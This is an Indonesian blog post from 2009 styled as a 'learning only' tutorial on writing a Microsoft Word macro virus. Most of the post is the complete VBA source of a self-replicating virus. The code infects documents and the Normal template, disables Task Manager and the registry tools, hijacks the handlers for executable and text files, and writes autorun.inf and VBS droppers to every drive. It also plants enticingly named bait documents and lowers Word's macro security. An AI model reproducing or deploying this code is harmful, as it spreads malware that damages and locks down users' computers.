Minggu, 19 Juli 2009

Virus Tutorial : Tehnik Membuat Virus Macro By Wong Liyo

(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)

Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.

Kali ini saya akan membahas mengenai virus macro... (para virus maker diharap untuk tenang dulu!).

Pasti banyak bertanya kenapa kali ini Morphic membahas tentang cara membuat virus? Biasanya kan Morphic lebih sering membahas analisis virus atau antivirusnya itu….

Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.

Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.

CARA MEMBUAT VIRUS MACRO

Buka Ms.Word (hanya contoh)

buka tools > Macro> Visual Basic Editor



Akan muncul gambar di bawah



Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.



Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???

Tenang, aku dah siapkan kok sourcenya. Makan neh source code!


'This is my code's virus


'


'Fuck Gates. Your software has small weakness. Watch it!


'


'Macro Viruses


'[Macroid]


'


'Hanya untuk pembelajaran




Private Sub Document_Close()


Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




If Dir(Environ$("windir") & "\Macroid.doc") = "" Then


Dim isicrita As String


isicrita = "[Macroid] by Morphic" & vbCrLf & "Copyright(c) Medan Juli-2008" & vbCrLf & vbCrLf & _


Chr(34) & "Ms.Word is a thing that can be used as a power to break everything.... " & Chr(34) & vbCrLf & "(Morphic)"


Open Environ$("windir") & "\Macroid.doc" For Output As #1


Print #1, isicrita


Close #1


End If




If Dir(Environ$("windir") & "\avmc.vbs") = "" Then


Open Environ$("windir") & "\avmc.vbs" For Output As #1


Print #1, "set fs = createobject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"


Print #1, "for each FD in fs.drives"


Print #1, "if (FD.Drivetype = 1) and FD.Path <> " & Chr(34) & "A:" & Chr(34) & " then"


Print #1, "set tf = fs.CreateTextFile(FD.Path" & Chr(38) & Chr(34) & "\Jangan di baca.doc" & Chr(34) & ")"


Print #1, "end if"


Print #1, "Next"


Close #1


End If


ActiveDocument.Save


NormalTemplate.Save


End Sub




Private Sub Document_Open()


CommandBars("Tools").Controls("Macro").Visible = False


CommandBars("Tools").Controls("Macro").Enabled = False


CommandBars("Tools").Controls("Customize...").Visible = False


CommandBars("Tools").Controls("Options...").Visible = False




Dim AD, NT As Object


Dim isi As String


Set AD = ActiveDocument.VBProject.VBComponents.Item(1)


Set NT = NormalTemplate.VBProject.VBComponents.Item(1)




If AD.Name <> "Macroid" Then


AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines


AD.Name = "Macroid"


isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)


AD.CodeModule.AddFromString isi


ActiveDocument.Save


End If




If NT.Name <> "Macroid" Then


NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines


NT.Name = "Macroid"


isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)


NT.CodeModule.AddFromString isi


NormalTemplate.Save


End If




If InStr(ActiveDocument.Content, "Macroid") = 0 Then


ActiveDocument.Content = "[Macroid]" & vbCrLf & ActiveDocument.Content & vbCrLf & vbCrLf & vbCrLf & "[Macroid] by Morphic" & vbCrLf & "copyright(c) Medan Juli-2008"


End If




On Error Resume Next


Dim b As Object


Set b = CreateObject("Wscript.Shell")


b.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title", "Browser Internet ini diambil alih oleh Macroid"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Macroid"


b.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "VM-Morphic"


b.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Macroid-A. Eat this!!! Ha ha ha"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "2"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1"


b.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\", "Tong Sampah Macroid"


b.regwrite "HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\", "Komputer Morphic"


b.regwrite "HKLM\SOFTWARE\Classes\exefile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\comfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\txtfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\scrfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\batfile\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




End Sub






Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg....... Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI





Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

Jawabannya lihat di bawah!!

Comments :

0 komentar to “Virus Tutorial : Tehnik Membuat Virus Macro By Wong Liyo”

Posting Komentar

Blog Archive

 

Copyright © 2009 by ¤ëXcêL™¤ ßlõg